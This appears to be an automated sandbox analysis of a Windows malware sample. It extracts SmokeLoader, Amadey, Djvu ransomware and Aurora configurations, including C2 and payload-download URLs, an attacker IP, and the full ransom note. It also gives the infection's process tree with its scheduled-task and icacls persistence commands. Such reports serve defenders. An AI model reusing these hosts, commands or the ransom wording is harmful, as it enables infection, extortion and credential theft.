Analysis
-
max time kernel
114s -
max time network
152s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
18-04-2023 14:37
Static task
static1
Behavioral task
behavioral1
Sample
6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe
Resource
win10-20230220-en
General
-
Target
6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe
-
Size
351KB
-
MD5
9eecf3d3451368f7962b97a902908494
-
SHA1
6c7ff2c7616f6fd6fc875d231b674402b36fe626
-
SHA256
6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82
-
SHA512
0d29b0383c2e193915e99a91f769b0249a65b3c7634512f3a1f32c11cc55db039680667ae37e27fa8946910e039349318b06ca139e2167495c106a600c98b0f9
-
SSDEEP
6144:orw3xkm1wO0RkW9ty3GGw3717k2AeQ7QxmX34mIv:orG+8wO0RkW3yfw32YQMA345v
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
smokeloader
sprg
Extracted
amadey
3.70
77.73.134.27/n9kdjc3xSf/index.php
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.coty
-
offline_id
O8Ao46dcCReRPC4I1PGMYsRFFc9WI5eOp0O3MFt1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-bs3qPf67hU Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0692JOsie
Extracted
aurora
104.248.91.138:8081
Signatures
-
Detected Djvu ransomware 31 IoCs
Processes:
resource yara_rule behavioral1/memory/4660-165-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4660-168-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4660-173-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3856-171-0x00000000025A0000-0x00000000026BB000-memory.dmp family_djvu behavioral1/memory/4660-180-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4660-209-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-231-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-233-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1544-236-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1544-237-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-239-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1544-242-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-250-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-247-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1544-253-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-278-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-281-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-283-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-285-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-304-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-307-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-319-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-334-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-335-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-338-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-341-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-342-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-350-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4508-355-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1884-356-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/68-644-0x0000019398410000-0x0000019398420000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
XandETC.exedescription pid process target process PID 1684 created 3184 1684 XandETC.exe Explorer.EXE PID 1684 created 3184 1684 XandETC.exe Explorer.EXE PID 1684 created 3184 1684 XandETC.exe Explorer.EXE PID 1684 created 3184 1684 XandETC.exe Explorer.EXE PID 1684 created 3184 1684 XandETC.exe Explorer.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exeflow pid process 66 3004 powershell.exe 68 3004 powershell.exe 86 512 powershell.exe 89 512 powershell.exe 110 512 powershell.exe 111 512 powershell.exe -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
Explorer.EXEpid process 3184 Explorer.EXE -
Executes dropped EXE 28 IoCs
Processes:
B105.exeB339.exeCEB1.exeD1CF.exeD450.exess31.exeoldplayer.exeD1CF.exeXandETC.exeoneetx.exeE7D9.exeEAA9.exeD1CF.exeEC31.exeF1B0.exeD1CF.exeEC31.exeEC31.exebuild3.exeEC31.exebuild3.exe461A.exeWindowsUpdate.exeoneetx.exeupdater.exemstsca.exesvchost.exesyshost.exepid process 4872 B105.exe 4300 B339.exe 4208 CEB1.exe 3856 D1CF.exe 2548 D450.exe 1800 ss31.exe 3904 oldplayer.exe 4660 D1CF.exe 1684 XandETC.exe 4664 oneetx.exe 4304 E7D9.exe 4940 EAA9.exe 5008 D1CF.exe 484 EC31.exe 816 F1B0.exe 1884 D1CF.exe 1544 EC31.exe 212 EC31.exe 3880 build3.exe 4508 EC31.exe 1108 build3.exe 3800 461A.exe 4916 WindowsUpdate.exe 4428 oneetx.exe 4788 updater.exe 2880 mstsca.exe 984 svchost.exe 640 syshost.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
D1CF.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\80941597-9341-4e71-ab71-7dfd7edb79fa\\D1CF.exe\" --AutoStart" D1CF.exe Set value (str) \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\config\\runtime.exe" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_2 = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\config\\runtime.exe" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 api.2ip.ua 18 api.2ip.ua 34 api.2ip.ua 36 api.2ip.ua 49 api.2ip.ua -
Suspicious use of SetThreadContext 4 IoCs
Processes:
D1CF.exeD1CF.exeEC31.exeEC31.exedescription pid process target process PID 3856 set thread context of 4660 3856 D1CF.exe D1CF.exe PID 5008 set thread context of 1884 5008 D1CF.exe D1CF.exe PID 484 set thread context of 1544 484 EC31.exe EC31.exe PID 212 set thread context of 4508 212 EC31.exe EC31.exe -
Drops file in Program Files directory 1 IoCs
Processes:
XandETC.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe -
Drops file in Windows directory 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\System\svchost.exe powershell.exe File created C:\Windows\System\syshost.exe powershell.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2084 sc.exe 1668 sc.exe 3140 sc.exe 1772 sc.exe 2864 sc.exe 3420 sc.exe 1780 sc.exe 3744 sc.exe 4320 sc.exe 4192 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4900 4304 WerFault.exe E7D9.exe 4460 3800 WerFault.exe 461A.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
F1B0.exe6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exeD450.exeB339.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F1B0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F1B0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D450.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B339.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D450.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D450.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F1B0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B339.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B339.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4100 schtasks.exe 1308 schtasks.exe 3964 schtasks.exe 2308 schtasks.exe 1308 schtasks.exe 1996 schtasks.exe 656 schtasks.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exeExplorer.EXEpid process 3612 6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe 3612 6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3184 Explorer.EXE -
Suspicious behavior: MapViewOfSection 22 IoCs
Processes:
6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exeB339.exeD450.exeF1B0.exeExplorer.EXEpid process 3612 6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe 4300 B339.exe 2548 D450.exe 816 F1B0.exe 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE 3184 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXEpowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 3004 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeIncreaseQuotaPrivilege 3004 powershell.exe Token: SeSecurityPrivilege 3004 powershell.exe Token: SeTakeOwnershipPrivilege 3004 powershell.exe Token: SeLoadDriverPrivilege 3004 powershell.exe Token: SeSystemProfilePrivilege 3004 powershell.exe Token: SeSystemtimePrivilege 3004 powershell.exe Token: SeProfSingleProcessPrivilege 3004 powershell.exe Token: SeIncBasePriorityPrivilege 3004 powershell.exe Token: SeCreatePagefilePrivilege 3004 powershell.exe Token: SeBackupPrivilege 3004 powershell.exe Token: SeRestorePrivilege 3004 powershell.exe Token: SeShutdownPrivilege 3004 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeSystemEnvironmentPrivilege 3004 powershell.exe Token: SeRemoteShutdownPrivilege 3004 powershell.exe Token: SeUndockPrivilege 3004 powershell.exe Token: SeManageVolumePrivilege 3004 powershell.exe Token: 33 3004 powershell.exe Token: 34 3004 powershell.exe Token: 35 3004 powershell.exe Token: 36 3004 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 512 powershell.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeIncreaseQuotaPrivilege 512 powershell.exe Token: SeSecurityPrivilege 512 powershell.exe Token: SeTakeOwnershipPrivilege 512 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
oldplayer.exepid process 3904 oldplayer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Explorer.EXECEB1.exeD1CF.exeoldplayer.exeoneetx.exeD1CF.exeEAA9.exeD1CF.exedescription pid process target process PID 3184 wrote to memory of 4872 3184 Explorer.EXE B105.exe PID 3184 wrote to memory of 4872 3184 Explorer.EXE B105.exe PID 3184 wrote to memory of 4872 3184 Explorer.EXE B105.exe PID 3184 wrote to memory of 4300 3184 Explorer.EXE B339.exe PID 3184 wrote to memory of 4300 3184 Explorer.EXE B339.exe PID 3184 wrote to memory of 4300 3184 Explorer.EXE B339.exe PID 3184 wrote to memory of 4208 3184 Explorer.EXE CEB1.exe PID 3184 wrote to memory of 4208 3184 Explorer.EXE CEB1.exe PID 3184 wrote to memory of 4208 3184 Explorer.EXE CEB1.exe PID 3184 wrote to memory of 3856 3184 Explorer.EXE D1CF.exe PID 3184 wrote to memory of 3856 3184 Explorer.EXE D1CF.exe PID 3184 wrote to memory of 3856 3184 Explorer.EXE D1CF.exe PID 3184 wrote to memory of 2548 3184 Explorer.EXE D450.exe PID 3184 wrote to memory of 2548 3184 Explorer.EXE D450.exe PID 3184 wrote to memory of 2548 3184 Explorer.EXE D450.exe PID 4208 wrote to memory of 1800 4208 CEB1.exe ss31.exe PID 4208 wrote to memory of 1800 4208 CEB1.exe ss31.exe PID 4208 wrote to memory of 3904 4208 CEB1.exe oldplayer.exe PID 4208 wrote to memory of 3904 4208 CEB1.exe oldplayer.exe PID 4208 wrote to memory of 3904 4208 CEB1.exe oldplayer.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 3856 wrote to memory of 4660 3856 D1CF.exe D1CF.exe PID 4208 wrote to memory of 1684 4208 CEB1.exe XandETC.exe PID 4208 wrote to memory of 1684 4208 CEB1.exe XandETC.exe PID 3904 wrote to memory of 4664 3904 oldplayer.exe oneetx.exe PID 3904 wrote to memory of 4664 3904 oldplayer.exe oneetx.exe PID 3904 wrote to memory of 4664 3904 oldplayer.exe oneetx.exe PID 4664 wrote to memory of 3964 4664 oneetx.exe schtasks.exe PID 4664 wrote to memory of 3964 4664 oneetx.exe schtasks.exe PID 4664 wrote to memory of 3964 4664 oneetx.exe schtasks.exe PID 4660 wrote to memory of 5032 4660 D1CF.exe icacls.exe PID 4660 wrote to memory of 5032 4660 D1CF.exe icacls.exe PID 4660 wrote to memory of 5032 4660 D1CF.exe icacls.exe PID 3184 wrote to memory of 4304 3184 Explorer.EXE E7D9.exe PID 3184 wrote to memory of 4304 3184 Explorer.EXE E7D9.exe PID 3184 wrote to memory of 4304 3184 Explorer.EXE E7D9.exe PID 4660 wrote to memory of 5008 4660 D1CF.exe D1CF.exe PID 4660 wrote to memory of 5008 4660 D1CF.exe D1CF.exe PID 4660 wrote to memory of 5008 4660 D1CF.exe D1CF.exe PID 3184 wrote to memory of 4940 3184 Explorer.EXE EAA9.exe PID 3184 wrote to memory of 4940 3184 Explorer.EXE EAA9.exe PID 3184 wrote to memory of 484 3184 Explorer.EXE EC31.exe PID 3184 wrote to memory of 484 3184 Explorer.EXE EC31.exe PID 3184 wrote to memory of 484 3184 Explorer.EXE EC31.exe PID 4940 wrote to memory of 3004 4940 EAA9.exe powershell.exe PID 4940 wrote to memory of 3004 4940 EAA9.exe powershell.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe PID 5008 wrote to memory of 1884 5008 D1CF.exe D1CF.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe"C:\Users\Admin\AppData\Local\Temp\6f4a6edeadbbbf65382961c8c4e3a40d00ca98aacaa773f3064f9691829b8b82.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3612 -
C:\Users\Admin\AppData\Local\Temp\B105.exeC:\Users\Admin\AppData\Local\Temp\B105.exe2⤵
- Executes dropped EXE
PID:4872 -
C:\Users\Admin\AppData\Local\Temp\B339.exeC:\Users\Admin\AppData\Local\Temp\B339.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\CEB1.exeC:\Users\Admin\AppData\Local\Temp\CEB1.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F5⤵
- Creates scheduled task(s)
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\D1CF.exeC:\Users\Admin\AppData\Local\Temp\D1CF.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\D1CF.exeC:\Users\Admin\AppData\Local\Temp\D1CF.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\80941597-9341-4e71-ab71-7dfd7edb79fa" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:5032 -
C:\Users\Admin\AppData\Local\Temp\D1CF.exe"C:\Users\Admin\AppData\Local\Temp\D1CF.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\D1CF.exe"C:\Users\Admin\AppData\Local\Temp\D1CF.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
PID:1884 -
C:\Users\Admin\AppData\Local\e40c5fd9-a3f4-4d4c-a541-3bef0188e2db\build3.exe"C:\Users\Admin\AppData\Local\e40c5fd9-a3f4-4d4c-a541-3bef0188e2db\build3.exe"6⤵
- Executes dropped EXE
PID:3880 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\D450.exeC:\Users\Admin\AppData\Local\Temp\D450.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\E7D9.exeC:\Users\Admin\AppData\Local\Temp\E7D9.exe2⤵
- Executes dropped EXE
PID:4304 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 7803⤵
- Program crash
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\EAA9.exeC:\Users\Admin\AppData\Local\Temp\EAA9.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4940 -
